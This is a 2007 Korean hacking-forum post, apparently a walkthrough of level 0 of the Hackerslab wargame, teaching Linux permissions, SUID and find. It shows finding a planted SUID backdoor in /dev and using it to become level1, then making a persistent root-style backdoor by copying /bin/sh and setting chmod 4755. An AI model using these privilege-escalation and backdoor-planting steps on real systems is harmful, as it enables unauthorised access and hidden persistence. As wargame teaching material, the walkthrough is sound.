1580, 3/79 회원가입  로그인  
   HackerMapia
   * 홈페이지 해킹 * 좋은자료 *

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=640 [복사]


누군가 우리 시스템에 침입하여 백도어를 설치하여 두었다.

당신의 임무는 그 백도어를 악용하여 다음 레벨로 진입하는 것이다.

Hint - 디바이스도 아닌 것이 디바이스 드라이버 무리속에...




-----------------------------------------------------




우선 문제를 해석해봅시다..




백도어란.. 일반사용자가 루뜨권한을 획득하고 추후에 다시 들어왔을때




루뜨권한을 손쉽게 얻기위해 만들어 놓는 것입니다




즉 여기서는 처음 접속하면 level0 이니깐 누군가 level1 권한을 획득한후




level0 이 손쉽게 level1의 권한을 획득할수있도록 백도어를 설치해놓았다는




것이 되겠죠..




힌트가 디바이스가 아닌 것이 디바이스 무리속에..네요




윈도우 보면 c:\안에 windows , my docu~ , programfile 등 여러가지폴더를




보실수 있으실 것입니다 그런데..




윈도우98에서는 디스켓넣는부분을 a:\로 씨디롬은 d:\로 구별하는반면




리눅스는 드라이브역시 파일로 인식합니다.




즈 마우스나 씨디롬 하드등을요.. 하드웨어는 리눅스에서는 /dev라는




디렉토리에 집합을 합니다. 리눅스의 디렉토리 구조에 대해서 한번 찾아보세요




여기서 백도어는 SetUID 즉 Suid로 실행 순간 운영자의 권한을 얻는것을 말합니다




핵랩에서는 자기보다 높은 권한이 되겠죠?







즉 문제를 해석해보면 /dev 디렉토리에 suid로된 백도어가 되었다는 말이되겠죠?




자 문제를 풀어볼까요?




텔넷연결 drill.hackerslab.org




login : level0

passwd : guest [한 3초쉬고 엔터]




[level0@drill level0]$ cd tmp [내 디렉토리에서 tmp 디렉토리로 들어가자]




[level0@drill tmp]$ find / -user level1 -group level0 -perm -4000 >list




여기서 위명령어는 / 전디렉토리에서 소유자가 level1 이고 그룹이 level0인

suid가 걸린 파일을 찾아서 list 라는 곳에 저장하여라는 말이예요




[level0@drill tmp]$ cat list [list를 확인해 볼까요?]

/dev/.hi




[level0@drill tmp]$ ls -al /dev/.hi [발견한 파일의 정보를 봅시다]

-rwsr-x--- 1 level1 level0 12900 Jan 28 2000 /dev/.hi




[level0@drill tmp]$

[level0@drill tmp]$ whoami [나는 누구인가?]

level0

[level0@drill tmp]$ /dev/.hi [백도어를 실행시켜 볼까요..]

[level0@drill tmp]$ whoami

level1

[level0@drill tmp]$ pass [이걸 치면 레벨1로가는 답이 나오겠죠?]




자 이번에는 우리가 직접 백도어를 만들어 봅시다




[level0@drill tmp]$ whoami ; pwd [내가 누구인가? 그리고 지금 어디에있지?]

level1

/home/level0/tmp




[level0@drill tmp]$ cp /bin/sh /home/level0/tmp/cs [cp A B => A를 B로 복사하라]

[level0@drill tmp]$ chmod 4755 cs [4755는 퍼미션을 준것으로 퍼미션참조바람]

[level0@drill tmp]$ ls -al cs [앗! rws.. suid..레벨0이 이걸 실행하면 레벨1이되겠군]

-rwsr-xr-x 1 level1 level0 373304 Aug 8 16:44 cs*

[level0@drill tmp]$ exit

exit

[level0@drill tmp]$ whoami

level0

[level0@drill tmp]$ ./cs [실행시켜볼까?]

[level0@drill tmp]$ whoami

level1

[level0@drill tmp]$







이게 끝입니다. 너무 시시하죠?




저 위에 명령어들에 대해 갈쳐달라고만 하지마시고




직접 찾아보시는 모습을 기대하겠습니다




그리고 ★퍼미션,suid,find 이해가 주된목적인 강좌입니다

해커스쿨에서 리눅스를 배우는 우리들에게
좋은자료가 될거라고본다.

출저 cafe daum /nukings

  Hit : 10616     Date : 2007/02/22 08:07



    
HackerMapia 이러다가 해커스쿨 해킹당하는거 아니야 ? ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 2007/02/22  
asdf 제목과는 다른 내용이네요. 해커스랩 fhz 1번 문제 풀이인데 .. 2007/02/22
HackerMapia 저는 똑같이 퍼온거뿐입니다 2007/02/22  
HackerMapia 흠 난왜 저기에 텔넷접속이 안되지 ; 2007/02/22  
whqkdnf000 해커스랩 텔넷 막혔던데; 2007/02/24  
kyw1111 제가 어떤카페에들어갓는데 해커스쿨 이라는곳을뚫어보앗다라는글을봣음 거기에 해커스쿨사람들아이디하고비번잇던디... 2007/04/09
exceed@null ㅋㅋㅋ 좋은 글입니다. 2007/07/16  
1540   * 해킹영화 볼만한거 *[5]     HackerMapia
02/20 11662
1539   * 해커의 분류 *[6]     HackerMapia
02/22 7533
1538   * 해커가 되고싶나 ? *[19]     HackerMapia
03/01 12504
1537   * 해커가 알아야할 30가지 *[2]     HackerMapia
02/22 9473
1536   * 해커를 위한 레지스트리 해부 강좌 *[2]     HackerMapia
02/24 10549
  * 홈페이지 해킹 * 좋은자료 *[7]     HackerMapia
02/22 10615
1534   * for문 사용법[2]     limjongmin
08/20 6804
1533   * printf 사용법     limjongmin
08/20 6410
1532   * window Vista 에 대해... *[3]     HackerMapia
02/22 7658
1531   * 평민들에게 권하는 테크닉 *[14]     HackerMapia
02/20 8304
1530   * 컴퓨터 종료 아이콘만들기 *[9]     HackerMapia
02/24 9448
1529   * 컴퓨터가 다운되는 8가지 이유 *[2]     HackerMapia
02/24 7312
1528   * 내컴퓨터 누가 만졋나;; *[13]     HackerMapia
02/24 9365
1527   * 도스 내부명령어 1 시작 - 실행 - cmd *[1]     HackerMapia
02/20 8860
1526   * 도스 외부명령어 1 *[1]     HackerMapia
02/20 7582
1525   * 도스명령어 최강자 되기 *[1]     HackerMapia
02/20 8412
1524   * 동영상 끊김없이 감상하기 *     HackerMapia
03/02 8496
1523   * 보안에 대한 주요 FAQ[8]     dl4815
01/14 10735
1522   * 엘리트해커가 되는길 *추천 *[30]     HackerMapia
03/02 14409
1521   - 재밌는글 설린인터넷고[1]     twinz
08/27 7749
[1][2] 3 [4][5][6][7][8][9][10]..[79]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com